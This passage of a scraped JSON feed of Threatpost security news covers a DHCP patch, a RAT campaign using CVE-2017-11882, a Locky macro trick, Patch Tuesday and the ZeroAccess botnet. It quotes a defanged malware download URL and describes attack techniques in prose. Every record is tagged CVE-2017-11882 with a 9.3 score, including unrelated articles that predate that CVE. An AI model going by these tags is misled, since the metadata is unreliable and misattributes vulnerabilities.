said.\n\nDHCP, or the Dynamic Host Configuration Profile, automates the assignment of IP hosts with IP addresses and configuration information. Its used in all Windows clients and most Windows server deployments dating back to Windows 98.\n\nThe use of DHCP frees Windows administrators, for example, from manually configuring IP addresses for networked computers.\n\nISC added that servers, clients and relays built to process only unicast packets are not affected by this vulnerability, the organization cautions that this is an unusual configuration.\n\n\u201cNot all potentially-affected builds will actually be affected, but because it is difficult to identify or predict those which should be upgraded, our advice is that all builds should be considered vulnerable,\u201d ISC said, adding that it is not aware of active exploits against this flaw.\n\nISC added that there are no workaround available, but there are some measures that can be taken to limit the exposure of DHCP servers.\n\nAdmins are advised to upgrade immediately to DHCP version 4.1-ESV-R12-P1 or DHCP version 4.3.3-P1.\n", "cvss3": {}, "published": "2016-01-13T10:00:25", "type": "threatpost", "title": "DHCP Denial of Service Vulnerability Patched", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-01-13T14:35:27", "id": "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "href": "https://threatpost.com/denial-of-service-flaw-patched-in-dhcp/115875/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "When one Pennsylvanian man couldn\u2019t foot his bills, he opted to steal the identity of someone that could \u2013 one of the world\u2019s richest men, Microsoft co-founder and billionaire Paul Allen.\n\nAn AWOL solider from Pittsburgh swiped Allen\u2019s Citibank credit card account information earlier this year to make a $658.81 payment on a loan from the Armed Forces Bank, according to an [Associated Press report](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n\nA criminal complaint unsealed Monday claims that after acquiring Allen\u2019s account information, the soldier, Brandon Lee Prince, 28, changed the address of the card to his own and reported it missing in an attempt to have a new card sent to his Pittsburgh address. The card was delivered and soon after, the fraudulent charges began to pile up.\n\nOn top of the loan payment, it was also used at a Pittsburgh GameStop ($278.18), a Family Dollar ($1) and at a Western Union, where Price tried to process a $15,000 transaction.\n\nThe bank noticed the illicit charges and promptly notified the FBI who had an agent follow Price around the neighborhood. After seeing him wearing the same clothes he wore in surveillance footage taken at the GameStop and Family Dollar stores, Price was arrested on March 2.\n\nAccording to authorities, Price had actually been away from the army since June 2010 and wanted as a deserter.\n\nAllen, who helped found Microsoft with Bill Gates in 1975, also owns the NBA\u2019s Portland Trailblazers and the NFL\u2019s Seattle Seahawks and has a net worth of about $14.2 billion, [according to Forbes](<http://www.forbes.com/profile/paul-allen/>) \u2013 enough to rank at number 48 on the [publication\u2019s list](<http://www.forbes.com/billionaires/#p_1_s_a0_All%20industries_All%20countries_All%20states_>) of the richest people on the planet.\n\nFor more on this, check out the AP report via the [Washington Post](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n", "cvss3": {}, "published": "2012-03-29T15:56:05", "type": "threatpost", "title": "Fortune Favors the Bold? Man Steals Microsoft Founder's Identity, Credit Card", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:32", "id": "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "href": "https://threatpost.com/fortune-favors-bold-man-steals-microsoft-founder-s-identity-credit-card-032912/76380/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-12T05:58:56", "description": "A series of espionage attacks have been uncovered, targeted at service centers in Russia that provide maintenance and support for a variety of electronic goods.\n\nThe payload is a commercial version of the [Imminent Monitor](<https://imminentmethods.net/features/>) tool, which is freely available for purchase as legitimate software. Its developers explicitly prohibit any usage of the tool in a malicious way \u2013 which bad actors are clearly ignoring.\n\nImminent Monitor includes two modules for recording video from a victim\u2019s webcam, along with three others that contain different spy and control functionalities, such as looking at file contents on the victim\u2019s machine.\n\n**A Long and Winding Kill Chain**\n\nFortiGuard Labs said that the multi-stage attacks use a whole bag of tricks to carry out their dirty work, including spoofed emails, malicious Office documents and a variety of unpacking techniques for Imminent Monitor, which functions as a remote access trojan (RAT).\n\nThe kill chain starts, as many attacks do, with fraudulent emails. In this case, they purport to be from Korean consumer electronics giant Samsung. FortiGuard researchers said that the nature of the mails suggests a targeted attack, not just a \u201cspray-and-pray\u201d random spam campaign.\n\n\u201cThe email was specifically sent to the service company that repairs Samsung\u2019s electronic devices,\u201d the firm said in [an analysis](<https://www.fortinet.com/blog/threat-research/non-russion-matryoshka-russian-service-centers-under-attack.html>) on Thursday, adding that the emails contain Excel files with the same naming convention that the targeted company uses in legitimate transactions.\n\nFurther, the spreadsheet files, which may have been lifted from a legitimate source, have been weaponized with an exploit for a vulnerability, CVE-2017-11882, in a 17-year-old piece of software.\n\n\u201cThe use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years,\u201d the team said. \u201cIt is simply not that easy to trick a user to opening executable file as it was before. Exploits are a different case.\u201d\n\nInterestingly, the vulnerability exists in an Office component called the Equation Editor (eqnedt32.exe), which allows users to insert mathematical and scientific equations into documents. It was kept around for compatibility reasons despite being flawed. Last year, Microsoft [manually patched](<https://blog.0patch.com/2017/11/did-microsoft-just-manually-patch-their.html>) a buffer overflow bug in it \u2014 the flaw used in these campaigns.\n\nRumors have gone around that choosing to patch the binary file rather than fixing the code itself suggests Microsoft lost the source code of the flawed feature, FortiGuard pointed out.\n\n\u201cThe malware authors clearly love this vulnerability because it allows them to achieve a stable exploitation across all current Windows platforms,\u201d the researchers said.\n\nFrom there, the exploit\u2019s shellcode takes a look at the export directory of the kernel32.dll on the targeted machine and locates the addresses of two key functions: LoadLibraryA and GetProcAddress. These are then used to obtain the addresses of the other necessary functions for the attack, including an important capability to determine the exact landing location for the payload, since this will vary, according to platform.\n\nFinally, the shellcode downloads the Imminent Monitor payload and then tries to execute it: The RAT is tucked into five different protective layers, including the ConfuserEx packer, which obfuscates objects names, as well as names of methods and resources, to make it hard to read and be understood by humans. ConfuserEx actually shows up twice; the second time, it includes a Rick-Rolling attempt.\n\nAnother packer used is the BootstrapCS executable, which performs anti-analysis checks; and eventually, for the final unpacking procedure of the RAT itself, the file uses the legit \u201clzma.dll\u201d library from 7Zip.\n\n**Not Their First Rodeo**\n\nEven though the emails are written in Russian, the attacks are coming from outside the country, carried out by a group known for other campaigns.\n\nThe analysts said that it\u2019s \u201chighly unlikely\u201d that a native Russian speaker wrote the email text, but rather, it seems to be run through a translator. Also, even though the \u201cfrom\u201d address appears to be Russian in origin, an examination of the headers revealed that IP address of the sender isn\u2019t related to the email address\u2019 domain.\n\nAlso, in analyzing the C2 servers used in the attacks, FortiGuard found, based on the registrant data, that 50 domains were all registered on the same day.\n\n\u201cSome of these domains have already been used for malware spreading,\u201d the firm said. \u201cAnother group was linked to the phishing campaigns.\u201d\n\nFortiGuard also searched its collection of samples and found several spreadsheet samples that use the same C2 servers as the samples from these attacks.\n\n\u201cThe samples are older and use different vulnerabilities,\u201d the researchers said. \u201cWe believe that this same group of attackers are behind both groups of samples.\u201d\n\nWhile it\u2019s unclear who exactly is behind the attacks, it\u2019s clear that this campaign is not the first \u2013 and will probably not be the last \u2013 for the bad actors.\n", "cvss3": {}, "published": "2018-06-07T19:43:35", "type": "threatpost", "title": "Targeted Spy Campaign Hits Russian Service Centers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-06-07T19:43:35", "id": "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "href": "https://threatpost.com/targeted-spy-campaign-hits-russian-service-centers/132639/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:10:28", "description": "Microsoft\u2019s initial move into the security products market, the ISA Server, has evolved well beyond its firewall roots. Now known as the Threat Management Gateway, the product is being positioned as a comprehensive Web security gateway. But as Eric Ogren writes in his [review of the Threat Management Gateway](<http://searchsecurity.techtarget.com/news/column/0,294698,sid14_gci1351077,00.html>) [SearchSecurity.com], the beta release offers enterprise IT shops some solid capabilities, but also has some considerable drawbacks.\n\nMicrosoft and nearly any other company on the planet, knows how to build products for mid-tier businesses. In high tech, vendors often prematurely rush features to market in efforts to win awards from reviewers and impress prospects with the depth of their feature checklist. Microsoft takes a very conservative approach with its security products to minimize customer administrative costs and provide fundamental security that works for the duration of the Microsoft relationship. This long term view has benefits and drawbacks for IT that can be illustrated by TMG.\n", "cvss3": {}, "published": "2009-03-18T15:56:00", "type": "threatpost", "title": "Microsoft's Threat Management Gateway is a mixed bag", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:35", "id": "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "href": "https://threatpost.com/microsofts-threat-management-gateway-mixed-bag-031809/72404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:10", "description": "[](<https://threatpost.com/ms-discovers-over-1800-office-2010-bugs-033110/>)Microsoft uncovered more than 1,800 bugs in \nOffice 2010 by tapping into the unused computing horsepower of idling \nPCs. Office developers \nfound the bugs by running millions of \u201cfuzzing\u201d tests, said Tom \nGallagher, senior security test lead with Microsoft\u2019s Trustworthy \nComputing group. [Read the full article](<http://www.computerworld.com/s/article/9174539/Microsoft_runs_fuzzing_botnet_finds_1_800_Office_bugs>). [Computerworld]\n", "cvss3": {}, "published": "2010-03-31T21:11:20", "type": "threatpost", "title": "MS Discovers Over 1,800 Office 2010 Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:06:49", "id": "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "href": "https://threatpost.com/ms-discovers-over-1800-office-2010-bugs-033110/73767/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:59", "description": "[](<https://threatpost.com/hunt-conficker-121409/>)There are several ongoing investigations attempting to find the authors of the Conficker botnet, one of the fastest spreading worms in history, but those responsible for the worm have proven elusive. [Read the full article](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1376771,00.html>). [TechTarget]\n", "cvss3": {}, "published": "2009-12-14T18:55:04", "type": "threatpost", "title": "On the Hunt for Conficker", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:54:03", "id": "THREATPOST:051AFF295EB4024C33B9C6988E0F5C34", "href": "https://threatpost.com/hunt-conficker-121409/73256/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:09", "description": "Researchers are warning about a new remotely exploitable vulnerability in 64-bit Windows 7 that can be used by an attacker to run arbitrary code on a vulnerable machine. The bug was first reported a couple of days ago by an independent researcher and confirmed by Secunia.\n\nIn a message on Twitter, a [researcher named w3bd3vil](<https://twitter.com/#%21/w3bd3vil/status/148454992989261824>) said that he had found a method for exploiting the vulnerability by simply feeding an iframe with an overly large height to Safari. The exploit gives the attacker the ability to run arbitrary code on the victim\u2019s machine.\n\n\u201cA vulnerability has been discovered in Micros[](<https://threatpost.com/researchers-warn-new-windows-7-vulnerability-122011/>)oft Windows, which can be exploited by malicious people to potentially compromise a user\u2019s system. The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large \u201cheight\u201d attribute viewed using the Apple Safari browser. Successful exploitation may allow execution of arbitrary code with kernel-mode privileges,\u201d the [Secunia advisory](<https://secunia.com/advisories/47237/>) said.\n\nMicrosoft officials have not confirmed the vulnerability, but said that they\u2019re looking into it.\n\n\u201cWe are currently examining the issue and will take appropriate action to help ensure the customers are protected,\u201d Jerry Bryant, group manager of response communications in Microsoft\u2019s Trustworhty Computing Group said.\n\nThe only known attack vector for this vulnerability right now is the Safari browser running on Windows 7, which is not the most common combination. Depending upon which metrics one uses, Safari has somewhere in the neighborhood of nine to 11 percent market share. It\u2019s not clear how many of those Safari users are running Windows, but it\u2019s likely that the vast majority of them are running Mac OS X.\n\nHowever, it\u2019s possible that it may turn out that other browsers could be used as attack vectors for this vulnerability as more information becomes available.\n", "cvss3": {}, "published": "2011-12-20T16:01:26", "type": "threatpost", "title": "Researchers Warn of New Windows 7 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:07", "id": "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "href": "https://threatpost.com/researchers-warn-new-windows-7-vulnerability-122011/76016/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:05", "description": "[](<https://threatpost.com/researcher-will-demo-bypass-windows-service-isolation-feature-090210/>)A prominent researcher will use an upcoming security conference in Buenos Aires to demonstrate an exploit that allows hackers to bypass the Windows Service Isolation feature, despite Microsoft\u2019s efforts to close the security loophole.\n\nSecurity researcher Cesar Cerrudo of [Argeniss Information Security and Software](<http://www.argeniss.com/>) said he will demonstrate an exploit he has developed that would allow hackers to bypass a security feature called Windows Service Isolation, which is intended to make it easier to access Windows objects without requiring a administrator level privileges. Cerrudo will use the upcoming ekoparty Security Conference in Buenos Aires to present his exploit. \n\nWriting to Threatpost.com, Cerrudo said that his presentation will demonstrate a method to bypass the Windows Service Isolation feature, allowing an attacker who is able to upload content to a Windows endpoint running applications such as SQL server and Internet Information Server (IIS) to elevate her privileges from the limited Local Service or Network Service account to the Local System account, providing broad access to install malicious code on or otherwise modify the system. \n\n\u201cFor instance it will allow you to compromise a Windows system if you can upload content to IIS or exploit any process running under (the) Network Service or Local Service account,\u201d Cerrudo wrote.\n\nThe demonstration, if successful, will poke a hole in a protection plan that Microsoft has proposed for the privilege escalation problem \u2013 part of a larger body of research on privilege escalation problems affecting all flavors of Windows that Cerrudo has documented in his paper \u201c[Token Kidnapping\u2019s Revenge](<http://www.argeniss.com/research/TokenKidnappingRevengePaper.pdf>).\u201d \n\nThe tendency to run popular services with administrator-level privileges has been exploited in the past by to install malicious programs on Windows systems. Microsoft added the Windows Service Isolation feature as a configuration option for companies that wanted to harden Windows servers and clients against attack. \n\nMicrosoft has responded to the problems raised by Cerrudo and others with a security update to the Windows Tracing Feature for Services, MS10-059 for Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. The company also [issued a security advisory,](<http://www.microsoft.com/technet/security/advisory/2264072.mspx>) for the Windows Service Isolation issue, which provides workarounds for Windows customers running Internet Information Server as well as a security fix for the privilege escalation problem that involves applying an update to the Windows Telephony API. \n\nCerrudo said that the configuration changes suggested by Microsoft will protect Windows machines running IIS, but not other applications. Windows shops that don\u2019t apply the security fix suggested are vulnerable to privilege escalation attacks if they\u2019re running other applications on affected systems. He suggests that Microsoft update its advisory to make it clear that the security fix described in the advisory is a requirement for any customer running applications other than IIS on affected systems. \n\nMicrosoft said it feels confident that its patch and advisory adequately cover the possible attacks that Cerrudo will demonstrate. Jerry Bryant, Group Manager, Trustworthy Computing, Microsoft said that its security advisory addresses \u201cthe potential for attacks that leverage the Windows Service Isolation feature by helping to clarify the proper use and limits of the Windows Service Isolation feature.\u201d However, the company notes that the Windows Service Isolation is a \u201cdefense-in-depth feature, not a proper security boundary\u201d and shouldn\u2019t be treated as such. \n", "cvss3": {}, "published": "2010-09-02T04:28:26", "type": "threatpost", "title": "Researcher Will Demo Bypass of Windows Service Isolation Feature", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:06:25", "id": "THREATPOST:3E3C8752E39F7A8CA5DD91BD283A79E7", "href": "https://threatpost.com/researcher-will-demo-bypass-windows-service-isolation-feature-090210/74416/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:18", "description": "Microsoft is warning of an innovative new technique attackers are using to sneak macro malware past virus detection engines and add to the already huge uptick in reported macro attacks.\n\nAccording to researchers at Microsoft\u2019s Malware Protection Center, they stumbled upon the macro technique in a file containing VBA project scripts with a sample of well-known malicious macro malware called [TrojanDownloader:O97M/Donoff](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDownloader:O97M/Donoff>). It wasn\u2019t the malware that piqued Microsoft\u2019s interest, it was the attacker\u2019s never-before-seen obfuscation technique.\n\nIt wasn\u2019t immediately obvious that the macro file was actually malicious, wrote Marianne Mallen and Wei Li, both antivirus researchers at the Microsoft Malware Protection Center, who co-authored [a blog post](<https://blogs.technet.microsoft.com/mmpc/2016/05/17/malicious-macro-using-a-sneaky-new-trick/>) earlier this week on their discovery. \u201cIt [was] a Word file that contains seven VBA modules and a VBA user form with a few buttons (using the CommandButton elements),\u201d wrote both authors.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/05/06235606/macro-form.png>)\n\nThe VBA user form contains three buttons. One of the buttons contained the encrypted URL.\n\nThe researchers said at first the VBA modules looked legit. \u201cNo malicious code found there \u2026 However, after further investigation we noticed a strange string in the Caption field for CommandButton3 in the user form,\u201d the researchers wrote.\n\nAs it turned out the attackers were embedding the malware using a \u201csneaky new trick.\u201d Upon further inspection, Microsoft said the attacker stored commands inside the name of a macro button. When the macro was executed it was directed to decrypt the data string used to name the macro button. Contained in the data string were commands to visit a specific URL where the malware could be downloaded onto the targeted computer from.\n\n\u201cThe macro will connect to the URL (hxxp://clickcomunicacion.es/&lt;uniqueid&gt;) to download a payload which we detect as Ransom:Win32/Locky,\u201d Microsoft wrote.\n\n\u201cAfter the macro runs, it is instructed to find the button and extract the (button\u2019s) name. Next, takestake that string (or the button\u2019s name) and decrypt it. Then the URL downloads the executable,\u201d commented Ryan Olson, researcher at Palo Alto in an interview with Threatpost. Olson said he has never seen this technique before, but there is nothing remarkable about the macro. \u201cThe Microsoft find is yet another iteration of a macro that uses a slightly different technique to evade detection.\u201d He said the technique is slick, but par for the course in the whack-a-mole arms race to trick and detect macros.\n\nAccording to Palo Alto, macro attacks are on the rise. This year Palo Alto reports 1.2 million instances of the Bartallex family of malware delivered via malicious macro documents. That\u2019s up from last year with 100,000 instances of Bartallex family macro malware.\n\n\u201cWe suspect that macro-based attacks are experiencing a resurgence from the late 1990s. There are a whole new pool of victims that don\u2019t remember how dangerous macros were and are learning the hard way to never trust macros unless sent from a 100 percent reliable source,\u201d Olson said.\n", "cvss3": {}, "published": "2016-05-21T09:00:53", "type": "threatpost", "title": "Microsoft Warns of Sneaky New Macro Trick", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-05-23T15:32:11", "id": "THREATPOST:42FDB1238D348C4F4A1074DB3091E6F2", "href": "https://threatpost.com/microsoft-warns-of-sneaky-new-macro-trick/118227/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "In a move that has surprised many in the security community, Microsoft has disbanded its Trustworthy Computing unit, the group that was responsible for the pioneering work that helped reverse the company\u2019s security reputation and make Windows a much more secure and reliable computing platform.\n\nThe end of the TwC group comes as Microsoft is in the middle of a major shift. The company on Thursday announced it was laying off 2,100 employees and also that it was closing its research facility in Silicon Valley. Under the changes in the security group at Microsoft, some of the TwC employees will be reassigned to the Cloud and Enterprise division and others will wind up in the legal group. The move presumably is an effort to integrate the security and privacy expertise in the TwC group into the rest of the company.\n\nThe break-up of the TwC group marks the end of an era at Microsoft, an era that began with the [memo that Bill Gates sent](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/76089>) to company employees in January 2002. Microsoft had been under fire from some of its larger customers\u2013government agencies, financial companies and others\u2013about the security problems in Windows, issues that were being brought front and center by a series of self-replicating worms and embarrassing attacks. Gates realized that the company was in danger of losing a large chunk of business if it didn\u2019t start making some changes regarding security, so he made the development of more secure products and platforms a top priority for all of Microsoft.\n\nThat began with putting developers through security training and also included stopping production on a major update to Windows in order to get the security of it right. It continued with Microsoft hiring security researchers, privacy experts and top software security people and eventually led to the creation of the Trustworthy Computing group. Gates\u2019s memo contemplated many of the changes that would come to computing, as well as the threats that would emerge.\n\n\u201cIn the past, we\u2019ve made our software and services more compelling for users by adding new features and functionality, and by making our platform richly extensible. We\u2019ve done a terrific job at that, but all those great features won\u2019t matter unless customers trust our software. So now, when we face a choice between adding features and resolving security issues, we need to choose security. Our products should emphasize security right out of the box, and we must constantly refine and improve that security as threats evolve. A good example of this is the changes we made in Outlook to avoid email borne viruses. If we discover a risk that a feature could compromise someone\u2019s privacy, that problem gets solved first. If there is any way we can better protect important data and minimize downtime, we should focus on this. These principles should apply at every stage of the development cycle of every kind of software we create, from operating systems and desktop applications to global Web services,\u201d he wrote in the [memo](<http://www.computerbytesman.com/security/billsmemo.htm>).\n\n\u201cGoing forward, we must develop technologies and policies that help businesses better manage ever larger networks of PCs, servers and other intelligent devices, knowing that their critical business systems are safe from harm. Systems will have to become self-managing and inherently resilient. We need to prepare now for the kind of software that will make this happen, and we must be the kind of company that people can rely on to deliver it.\u201d\n\nOver the years, the TwC group accomplished much of that, and more. Breaking the group up may disperse into the rest of the company the expertise that\u2019s been concentrated in TwC, enabling the security experts to work more closely with the engineering teams and other groups inside the company. Or it may lead to an exodus of talent from Redmond. Either way, it signals a turning point for Microsoft and its decade-long effort to make security a priority. Computing has evolved dramatically in that time, as have Microsoft\u2019s product offerings, priorities and challenges. Microsoft\u2019s decision to eliminate the TwC group is just another indication of those changing times.\n", "cvss3": {}, "published": "2014-09-19T11:43:52", "type": "threatpost", "title": "Era Ends With Break Up of Trustworthy Computing Group at Microsoft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:58:40", "id": "THREATPOST:90355E85731E1618F6C63A58CD426966", "href": "https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:23", "description": "The expected continued respite from deploying Internet Explorer patches was apparently a mirage as Microsoft changed course from last Thursday\u2019s advance notification and added two more bulletins to the [February 2014 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms14-feb>), including the first IE rollup of 2014.\n\nIE had patched monthly for close to a year until the January security bulletins were released, and eyebrows were raised again last Thursday when there was no mention of an IE update.\n\nToday, however, Microsoft reversed course with [MS14-010](<https://technet.microsoft.com/en-us/security/bulletin/ms14-010>), which patches 24 vulnerabilities in the browser, including one that has been publicly disclosed. No active exploits have been reported, Microsoft said.\n\nAll of the vulnerabilities enable remote code execution, and affect versions of IE going back to IE 6 on Windows XP up to IE 11 on Windows 8.1. More than 20 CVEs involving memory corruption vulnerabilities in IE were addressed along with a cross-domain information disclosure vulnerability, an elevation of privilege vulnerability and a memory corruption issue related to VBScript that is addressed in [MS14-011](<https://technet.microsoft.com/en-us/security/bulletin/ms14-011>).\n\nA IE user would have to be lured to a website hosting an exploit for the vulnerability in the VBScript scripting engine in Windows. The engine improperly handles objects in memory, Microsoft said, and an exploit could corrupt memory and allow an attacker to run code on a compromised machine.\n\n\u201cTo go from five to seven bulletins says to me that initial testing was completed last minute so they decided to slip the patch in or testing found an issue and engineer shipped a fix last minute,\u201d said Tyler Reguly, manager of security research at Tripwire. \u201cEither way, pay extra attention to MS14-010 and MS14-011 in your test environments this month before you push them out enterprise wide.\u201d\n\nColleague Craig Young cautions that a number of the IE vulnerabilities can be combined to gain admin access on compromised machines.\n\n\u201cWithout any doubt, attacks in the wild will continue and expand to the other vulnerabilities being fixed today,\u201d Young said.\n\nAs promised, Microsoft did patch a remote code execution vulnerability, [MS14-008](<https://technet.microsoft.com/en-us/security/bulletin/ms14-008>), in its Forefront Protection for Exchange 2010 security product. Microsoft said it removed the offending code from the software.\n\n\u201cI\u2019m sure a lot of people will call attention to the Forefront Protection for Exchange patch this month. However when Microsoft, the people with the source code, tells us they can\u2019t trigger the vulnerability in a meaningful way, I intend to believe them,\u201d said Tripwire\u2019s Reguly. \u201cI suspect we\u2019ll wake up tomorrow and beyond pressing apply, we\u2019ll forget this was even released.\u201d\n\nMicrosoft stopped updating Forefront for Exchange as of September 2012, but will support it with security updates for another 22 months\n\n\u201cThis should make administrators think about upgrading their Exchange servers to the latest version (which includes basic anti-malware protection by default) or consider a third party email security application,\u201d said Russ Ernst of Lumension. \u201cAdministrators that currently use Forefront Protection for Exchange have until December 2015 to get this done.\u201d\n\nThe final critical bulletin, [MS14-007](<https://technet.microsoft.com/en-us/security/bulletin/ms14-007>), is another remote code execution bug in Direct2D, which can only be triggered viewing malicious content in IE. Direct2D is a graphics API used for rendering 2-D geometry, bitmaps and text, Microsoft said. This vulnerability affects Windows 7 through Windows 8.1.\n\nMicrosoft also released three bulletins rated important that patch privilege elevation, information disclosure and denial of service vulnerabilities.\n\n * [MS14-009](<https://technet.microsoft.com/en-us/security/bulletin/ms14-009>) patches two publicly disclosed bugs in the .NET framework that could allow an attacker to elevate their privileges on a compromised machine.\n * [MS14-005](<https://technet.microsoft.com/en-us/security/bulletin/ms14-005>) handles a vulnerability in Microsoft XML Core Services that could lead to information disclosure if the victim visits a malicious site with IE.\n * [MS14-006](<https://technet.microsoft.com/en-us/security/bulletin/ms14-006>) addresses a denial-of-service vulnerability in Windows 8, RT, and Server 2012, that has been publicly disclosed. An attacker would have to send a large number of malicious IPv6 packets to a vulnerable system to exploit the bug, and the attacker must be on the same subnet as the victim.\n\nMicrosoft also sent out an update that officially [deprecates the use of the MD5 hash algorithm](<http://threatpost.com/light-microsoft-patch-load-precedes-md5-deprecation/104104>). Digital certificates with MD5 hashes issued under roots in the Microsoft root certificate program are from now on restricted.\n\n\u201cCertificates with MD5 hashes should no longer be considered safe,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing. \u201cWe\u2019ve given our customers six months to prepare their environments, and now this update is available through automatic updates.\u201d\n", "cvss3": {}, "published": "2014-02-11T14:19:34", "type": "threatpost", "title": "February 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-11T19:19:34", "id": "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "href": "https://threatpost.com/microsoft-adds-critical-ie-patches-under-the-wire/104214/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Long thought dead, the peer-to-peer (P2P) ZeroAccess botnet has resurfaced, and as of just a few weeks ago, has returned to propagating click-fraud scams.\n\nResearchers with Dell\u2019s SecureWorks [revealed Wednesday](<http://www.secureworks.com/resources/blog/zeroaccess-botnet-resumes-click-fraud-activity-after-six-month-break/>) that they witnessed the botnet restart itself from March 21 to July 2, 2014 and that halfway through this month \u2013 six months after it was last seen \u2013 the botnet has apparently gone back to its old ways and is again doling out click-fraud templates.\n\nClick-fraud, one of the easier techniques cybercriminals use to monetize malware, is essentially the embezzling of ad revenue from clicks that don\u2019t come from legitimate customers.\n\nDespite the botnet\u2019s resurfacing, researchers insist it hasn\u2019t grown or even tried to incorporate new compromises. Instead the botnet, which has split into two smaller botnets that use different UDP ports, is built around hosts from past infections.\n\nAs seen below, researchers found ZeroAccess in two smaller botnets in both 32-bit (blue) and 64-bit (gray) compromised Windows systems.\n\n\n\n\u201cCompromised systems act as nodes in the P2P network, and they periodically receive new templates that include URLs for attack-controlled template servers,\u201d the firm\u2019s Counter Threat Unit (CTU) wrote.\n\nOnce the URLs are visited, like a chain reaction, the bots are redirected to their final destination.\n\nThe unit claims it counted 55,000-plus different IP addresses \u2013 mostly in Japan, India and Russia \u2013 engaging with the botnet from Jan. 17 to Jan. 25. Some may consider 55K small potatoes compared to the botnet\u2019s heyday, when Microsoft cleaned half a million machines of the virus from Feb. to March 2013, but Dell is stressing that for all intents and purposes ZeroAccess should still be considered substantial.\n\nAdding that it may not be able to do what other flashy botnets can, like carry out banking fraud or hold users\u2019 files ransom, ZeroAccess can still wreak havoc on advertisers and machines it infects alike.\n\nIt was thought the [botnet was dead](<http://threatpost.com/microsoft-zeroaccess-botnet-has-been-abandoned/103273>) in December 2013 after Microsoft, along with Europol\u2019s European Cybercrime Centre (EC3), the F.B.I., and the firm A10 [disrupted ZeroAccess\u2019s](<http://threatpost.com/microsoft-and-friends-take-down-zeroaccess-botnet/103122>) two million odd machines. Click-fraud is just one of the botnet\u2019s favorite pastimes. ZeroAccess, a/k/a Sirefef, has also been seen hijacking search results and redirecting victims to malicious, information stealing websites and for a short stint the platform was even spotted [facilitating Bitcoin mining](<http://threatpost.com/zeroaccess-botnet-cashing-click-fraud-and-bitcoin-mining-103012/77168>).\n\n[Microsoft greatly curbed](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/100717>) the botnet\u2019s click-fraud tendencies in May 